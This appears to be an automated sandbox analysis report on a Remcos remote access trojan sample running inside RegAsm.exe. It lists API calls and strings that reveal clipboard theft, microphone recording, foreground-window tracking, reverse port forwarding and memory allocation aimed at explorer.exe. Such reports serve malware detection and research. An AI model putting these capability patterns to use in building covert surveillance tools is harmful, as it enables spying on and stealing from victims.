• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 65535$udp
                                                • API String ID: 0-1267037602
                                                • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                • GetForegroundWindow.USER32 ref: 0040AD84
                                                • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040ADC1
                                                • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                • String ID: [${ User has been idle for $ minutes }$]
                                                • API String ID: 911427763-3954389425
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
• GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
• __dosmaperr.LIBCMT ref: 0043A926
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
• GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
• __dosmaperr.LIBCMT ref: 0043A963
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
• GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
• __dosmaperr.LIBCMT ref: 0043A9B7
• _free.LIBCMT ref: 0043A9C3
• _free.LIBCMT ref: 0043A9CA
Memory Dump Source
• Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
• String ID:
• API String ID: 2441525078-0
APIs
• SetEvent.KERNEL32(?,?), ref: 004054BF
• GetMessageA.USER32 ref: 0040556F
• TranslateMessage.USER32(?), ref: 0040557E
• DispatchMessageA.USER32(?), ref: 00405589
• HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
• HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
• String ID: CloseChat$DisplayMessage$GetMessage
• API String ID: 2956720200-749203953
APIs
  • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
• CloseHandle.KERNEL32(00000000), ref: 00417E20
• DeleteFileA.KERNEL32(00000000), ref: 00417E2F
• ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
• String ID: 0VG$0VG$<$@$Temp
• API String ID: 1704390241-2575729100
APIs
• OpenClipboard.USER32 ref: 0041697C
• EmptyClipboard.USER32 ref: 0041698A
• CloseClipboard.USER32 ref: 00416990
• OpenClipboard.USER32 ref: 00416997
• GetClipboardData.USER32 ref: 004169A7
• GlobalLock.KERNEL32(00000000), ref: 004169B0
• GlobalUnlock.KERNEL32(00000000), ref: 004169B9
• CloseClipboard.USER32 ref: 004169BF
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
• String ID: !D@
• API String ID: 2172192267-604454484
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
• OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
Memory Dump Source
• Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
APIs
• _free.LIBCMT ref: 100059EA
  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
• _free.LIBCMT ref: 100059F6
• _free.LIBCMT ref: 10005A01
• _free.LIBCMT ref: 10005A0C
• _free.LIBCMT ref: 10005A17
• _free.LIBCMT ref: 10005A22
• _free.LIBCMT ref: 10005A2D
• _free.LIBCMT ref: 10005A38
• _free.LIBCMT ref: 10005A43
• _free.LIBCMT ref: 10005A51
Memory Dump Source
• Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• _free.LIBCMT ref: 004481B5
  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
• _free.LIBCMT ref: 004481C1
• _free.LIBCMT ref: 004481CC
• _free.LIBCMT ref: 004481D7
• _free.LIBCMT ref: 004481E2
• _free.LIBCMT ref: 004481ED
• _free.LIBCMT ref: 004481F8
• _free.LIBCMT ref: 00448203
• _free.LIBCMT ref: 0044820E
• _free.LIBCMT ref: 0044821C
Memory Dump Source
• Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Eventinet_ntoa
• String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
• API String ID: 3578746661-3604713145
APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
Strings
Memory Dump Source
• Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt
• API String ID: 3527080286-3064271455
APIs
• ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
• Sleep.KERNEL32(00000064), ref: 0041755C
• DeleteFileW.KERNEL32(00000000), ref: 00417590
Strings
Memory Dump Source
• Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: File$CreateDeleteExecuteShellSleep
• String ID: /t $\sysinfo.txt$dxdiag$open$temp
• API String ID: 1462127192-2001430897
APIs
• GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
• GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
Strings
Memory Dump Source
• Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CurrentProcess
• String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
• API String ID: 2050909247-4242073005
APIs
• _strftime.LIBCMT ref: 00401D50
  • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
• waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
• waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
• waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
Strings
Memory Dump Source
• Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
• String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
• API String ID: 3809562944-243156785
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
• int.LIBCPMT ref: 00410EBC
  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
• std::_Facet_Register.LIBCPMT ref: 00410EFC
• std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
• __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
• __Init_thread_footer.LIBCMT ref: 00410F64
Strings
Memory Dump Source
• Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
• String ID: ,kG$0kG
• API String ID: 3815856325-2015055088
                                                • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                APIs
                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                • waveInStart.WINMM ref: 00401CFE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                • String ID: dMG$|MG$PG
                                                • API String ID: 1356121797-532278878
                                                • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                  • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                                  • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                                  • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                • TranslateMessage.USER32(?), ref: 0041D57A
                                                • DispatchMessageA.USER32(?), ref: 0041D584
                                                • GetMessageA.USER32 ref: 0041D591
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                • String ID: Remcos
                                                • API String ID: 1970332568-165870891
                                                • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                • Opcode Fuzzy Hash: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                APIs
                                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                • __alloca_probe_16.LIBCMT ref: 00454014
                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                • __freea.LIBCMT ref: 00454083
                                                • __freea.LIBCMT ref: 0045408F
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                • String ID:
                                                • API String ID: 201697637-0
                                                • Opcode ID: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                                • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                • Opcode Fuzzy Hash: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                                • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                APIs
                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                • _free.LIBCMT ref: 00445515
                                                • _free.LIBCMT ref: 0044552E
                                                • _free.LIBCMT ref: 00445560
                                                • _free.LIBCMT ref: 00445569
                                                • _free.LIBCMT ref: 00445575
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                • String ID: C
                                                • API String ID: 1679612858-1037565863
                                                • Opcode ID: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                • Opcode Fuzzy Hash: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: tcp$udp
                                                • API String ID: 0-3725065008
                                                • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 004018BE
                                                • ExitThread.KERNEL32 ref: 004018F6
                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                • String ID: PkG$XMG$NG$NG
                                                • API String ID: 1649129571-3151166067
                                                • Opcode ID: 550caf075e583e476d87b570dd8e50d88aac4017f2d84a61fa09579770db8c75
                                                • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                • Opcode Fuzzy Hash: 550caf075e583e476d87b570dd8e50d88aac4017f2d84a61fa09579770db8c75
                                                • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                • CloseHandle.KERNEL32(00000000), ref: 00407A88
                                                • MoveFileW.KERNEL32 ref: 00407AA5
                                                • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                • String ID: .part
                                                • API String ID: 1303771098-3499674018
                                                • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                APIs
                                                • AllocConsole.KERNEL32 ref: 0041CE35
                                                • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
